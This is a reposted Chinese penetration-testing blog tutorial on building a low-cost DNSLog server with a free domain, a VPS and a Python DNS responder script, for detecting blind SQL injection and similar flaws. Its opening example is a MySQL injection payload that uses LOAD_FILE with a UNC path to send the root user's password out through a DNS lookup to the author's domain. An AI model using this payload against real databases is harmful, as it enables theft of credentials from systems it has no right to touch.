?

May 18 2019

如何低成本搭建dnslog服務器

首頁 » 滲透測試 » 如何低成本搭建dnslog服務器   

DNSLog,簡單來說,就是通過記錄對于域名的DNS請求,通過dns請求這個相對“隱蔽”的渠道,來委婉地獲取到想要獲得的信息。
例如,在一個針對mysql數據庫的注入中,如果沒有回顯,可能很多時候就要歇菜。
但如果對方的數據庫服務器連接公網并且是Windows機器的話,就可以用這種姿勢來獲取信息:

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM user WHERE user='root' LIMIT 1),'.nogan.ga\\xxx'))

你將會看到類似:

1.png


當然你可能會說直接用http協議傳輸不就好了嗎,確實http協議也可以,但是http協議畢竟有局限的地方,例如容易被防火墻限制等。
而dns作為一種基礎協議有時候并不會被隨便禁用,一些內網當中對于DNS協議的管控和檢測是個薄弱的點,相對http來說DNS協議也更加隱蔽。

近幾年DNSLog被尤其廣泛地運用于無回顯的SQL注入、命令執行、XML實體注入等漏洞的檢測當中,算是一門很基礎的老技術了。

關于DNSLog的具體應用,這里就不多說了,感興趣的可以進一步閱讀以下文章:

https://www.anquanke.com/post/id/98096 http://www.freebuf.com/column/158579.html https://www.cnblogs.com/afanti/p/8047530.html

那么如何低成本搭建dnslog服務器?接下來就來簡要分享一個低成本構建DNSLog服務的方法。

準備材料:

(1) 一臺低成本的VPS:這里推薦使用某國外的便宜VPS,完整root權限,單核512MB/10GSSD,¥128/年,購買鏈接在文章最后

(2) 一個可以接收郵件的郵箱:用來注冊免費域名

搭建過程

注冊域名

首先到 https://freenom.com 注冊用戶,同時注冊一個免費的域名
以我這里為例,注冊一個nogan.ga

2.jpg


注冊的時候,在DNS選項中,選擇使用自己的DNS,新建DNS服務器的地址,例如我這里自定義了兩個dns服務器,分別是
ns0.nogan.ga和ns1.nogan.ga,并且將他們的地址指向我的VPS服務器。

3.jpg

點擊Continue,進入到結算頁面。
如果你上一步沒有注冊用戶,那么可以直接在這里填你用來注冊用戶的郵箱,然后根據指引進行操作。
如果注冊了用戶,只需要直接登錄就可以了。

4.png

進入到Review and Checkout頁面,填入一些你的基本信息就可以了

5.png

這里記得勾選Lock profile,你的信息就不會被whois查詢到了。

6.png

接著下一步,勾選Complate Order,域名就注冊成功了。

7png.png

部署DNS服務

登錄你的VPS服務器,運行下面這個python腳本,將在你的VPS主機監聽UDP 53端口,并且回復DNS響應包:

記得修改IP地址和NS域名,在最后。

#!/usr/bin/env python # -*- coding: utf-8 -*- # @Date : 2014-06-29 03:01:25 # @Author  : Your Name ([email protected]) # @Link : http://example.org # @Version : $Id$ import SocketServer import struct import socket as socketlib # DNS Query class SinDNSQuery: def __init__(self, data): i = 1 self.name = '' while True:

            d = ord(data[i]) if d == 0: break; if d < 32:

                self.name = self.name + '.' else:

                self.name = self.name + chr(d)

            i = i + 1 self.querybytes = data[0:i + 1]

        (self.type, self.classify) = struct.unpack('>HH', data[i + 1:i + 5])

        self.len = i + 5 def getbytes(self): return self.querybytes + struct.pack('>HH', self.type, self.classify) # DNS Answer RRS # this class is also can be use as Authority RRS or Additional RRS  class SinDNSAnswer: def __init__(self, ip): self.name = 49164 self.type = 1 self.classify = 1 self.timetolive = 190 self.datalength = 4 self.ip = ip def getbytes(self): res = struct.pack('>HHHLH', self.name, self.type, self.classify, self.timetolive, self.datalength)

        s = self.ip.split('.')

        res = res + struct.pack('BBBB', int(s[0]), int(s[1]), int(s[2]), int(s[3])) return res # DNS frame # must initialized by a DNS query frame class SinDNSFrame: def __init__(self, data): (self.id, self.flags, self.quests, self.answers, self.author, self.addition) = struct.unpack('>HHHHHH', data[0:12])

        self.query = SinDNSQuery(data[12:]) def getname(self): return self.query.name def setip(self, ip): self.answer = SinDNSAnswer(ip)

        self.answers = 1 self.flags = 33152 def getbytes(self): res = struct.pack('>HHHHHH', self.id, self.flags, self.quests, self.answers, self.author, self.addition)

        res = res + self.query.getbytes() if self.answers != 0:

            res = res + self.answer.getbytes() return res # A UDPHandler to handle DNS query class SinDNSUDPHandler(SocketServer.BaseRequestHandler): def handle(self): data = self.request[0].strip()

        dns = SinDNSFrame(data)

        socket = self.request[1]

        namemap = SinDNSServer.namemap if(dns.query.type==1): # If this is query a A record, then response it name = dns.getname();

            toip = None ifrom = "map" if namemap.__contains__(name): # If have record, response it # dns.setip(namemap[name]) # socket.sendto(dns.getbytes(), self.client_address) toip = namemap[name] elif namemap.__contains__('*'): # Response default address # dns.setip(namemap['*']) # socket.sendto(dns.getbytes(), self.client_address) toip = namemap['*'] else: # ignore it # socket.sendto(data, self.client_address) # socket.getaddrinfo(name,0) try:

                    toip = socketlib.getaddrinfo(name,0)[0][4][0]

                    ifrom = "sev" # namemap[name] = toip # print socket.getaddrinfo(name,0) except Exception, e: print 'get ip fail' if toip:

                dns.setip(toip) print '%s: %s-->%s (%s)'%(self.client_address[0], name, toip, ifrom)

            socket.sendto(dns.getbytes(), self.client_address) else: # If this is not query a A record, ignore it socket.sendto(data, self.client_address) # DNS Server # It only support A record query # user it, U can create a simple DNS server class SinDNSServer: def __init__(self, port=53): SinDNSServer.namemap = {}

        self.port = port def addname(self, name, ip): SinDNSServer.namemap[name] = ip def start(self): HOST, PORT = "0.0.0.0", self.port

        server = SocketServer.UDPServer((HOST, PORT), SinDNSUDPHandler)

        server.serve_forever() # Now, test it if __name__ == "__main__":

    sev = SinDNSServer()

        sev.addname('ns0.nogan.ga','x.x.x.x') 

        sev.addname('ns1.nogan.ga','x.x.x.x')

        sev.addname('www.nogan.ga','y.y.y.y')

        sev.addname('*', '127.0.0.1') # default address sev.start() # start DNS server 

將上面的ns0.nogan.ga和ns1.nogan.ga改成你的域名,并且將x.x.x.x改成你的VPS服務器地址。
如果你在搭建DNSLog的同時還想順便搭建一個網站的話,可以添加一個www記錄,指向你的web服務器地址。
星號是將任意地址執行127.0.0.1,這樣你的DNSLog請求記錄,都會被默認解析到127.0.0.1。

接著在服務器上運行

python dns.py

在任意機器上面ping xxxxx.YOURDOMAIN:

8.png

可以在VPS上觀察到請求已經過來了

9.png

但這個時候程序是一直在控制臺運行的,想要退出怎么辦呢,用nohup將程序改為背景運行:

10.png

想要關閉的話,先查看端口并獲取進程號,然后kill即可:

11.png

Enjoy it~

附:

搬瓦工VPS優惠地址 (推薦 $19.99/年,約合RMB¥128):

https://bandwagonhost.com/cart.php (可能要扶梯 = = )


轉 https://www.cnblogs.com/Chorder/p/9087386.html

正文部分到此結束

文章標簽: dnslog

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «關于電子郵件詐騙的一些分析 | Thinkphp5.1 ~ 5.2代碼執行漏洞»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖